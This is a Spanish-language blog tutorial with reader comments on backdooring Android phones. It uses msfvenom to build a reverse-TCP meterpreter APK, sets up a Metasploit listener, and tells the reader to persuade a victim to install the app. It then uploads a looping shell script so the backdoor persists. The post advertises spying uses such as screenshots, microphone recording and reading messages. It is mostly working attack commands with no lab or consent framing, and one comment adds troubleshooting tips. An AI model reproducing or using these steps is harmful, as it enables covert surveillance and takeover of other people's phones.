Atacando Android -Backdoor Persistente -





   
 Luego de mucho tiempo de inactividad hoy vengo con un tema el cual nunca e tocado. Hablo de como podríamos llegar a atacar un sistema Android y obtener una meterpreter mediante una apk infectada. Como ya e mencionado en otros post, cuando obtenemos una sección meterpreter podemos hacer muchas cosas con el sistema victima como por ejemplo tomar capturas de pantalla, grabar audios con el micrófono, ver los mensajes al igual que las llamadas, y entre otras muchas cosas.

Bien empecemos, primero vamos a nuestro sistema atacante el cual será kali linux. Luego abrimos una terminal y pondremos el siguiente comando.

> msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.4 lport=4444 R > /root/Desktop/backdoor.apk

Bien lo que hicimos fue llamar msfvenom y con -p le indicamos el tipo de payload el cual vendría siendo android/meterpreter/reverse_tcp en host le indicamos nuestra ip y en lport el puerto que queremos dejar en modo escucha, luego R > significa la ruta donde queremos que se nos genere el apk y recordamos que debemos darle un nombre seguido de la extensión .apk en mi caso lo genere en el Desktop con el nombre backdoor.apk.

Ahora abrimos otra terminal y configuramos el modo escucha(listen) para cuando la victima instale el apk nos de nuestra meterpreter, haremos lo siguiente.

> msfconsole -q

> use multi/handler

> set payload android/meterpreter/reverse_tcp

Luego configuramos la ip y el puerto que usamos anterior mente en la apk.

> set lhost 192.168.0.4

> set lport 4444

> exploit -j

Listo ahora estará escuchando por la ip y el puerto que le dimos esperando una conexión.


Lo siguiente seria enviarla a nuestra victima y convencerlo de que la instale en su android. Una vez lo instale nos dirá que tenemos una nueva sección, para ver las secciones pondríamos.

> sessions -i

En nuestro caso solo tendremos una, para conectarnos a ella basta con poner.

> sessions -i 1



Aquí ya tendríamos nuestra meterpreter, para ver las opciones que tenemos podemos usar help.

> help



Nos saldrá una lista de comandos con su descripción.

Bien ahora debemos crear persistencia para conectarnos a nuestra victima cuando queramos. Para eso debemos ir al directorio sdcard de nuestro Android.

> cd /

> cd /sdcard/Download

Abrimos una terminal en nuestra maquina kali y creamos un archivo con el nombre persistence.sh  dentro de el copiamos el siguiente código.

#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done


volvemos a la meterpreter y una vez estamos en la ruta /sdcard/Download usamos el siguiente comando.

> upload /root/Desktop/persistence.sh

Luego abrimos una shell usando.

> shell

Vamos a la ruta de nuestro .sh y lo ejecutamos.


> cd /

> cd /sdcard/Download

> sh persistence.sh



Una vez lo ejecutemos el Android se reiniciara y perderemos la conexión pero tranquilos solo debemos volver a configurar el lister o el modo escucha y cuando el Android encienda nueva mente tendremos nuestra meterpreter.

Espero que les haya gustado este post, no olviden compartir y suscribirse gracias.

4 comentarios:

  1. amigo, no funciona, lo instale en mi android y no pasa nada, me podrias asesora por favor que es lo que esta pasando.

    ResponderEliminar
    Respuestas
    1. Si funciona a mi me sirvio los apk y el .sh si se hacen persistentes

      Eliminar
    2. El lister se activa solo dentro del mismo host y puerto que configuraste en tu apk , es decir si decido irme a "x" lugar y quiero probar ingresar al cel pues no funcionara por que y estaria sobre otra red en pocas palabras con este metodo por cada wifi distinta debes hacer un apk para ese host

      Eliminar
  2. Nice Blog, When i was read this blog i learnt new things & its truly have well stuff related to developing technology, Thank you for sharing this blog.
    iPhone app training course in bangalore
    Mobile app training institutes bangalore

    ResponderEliminar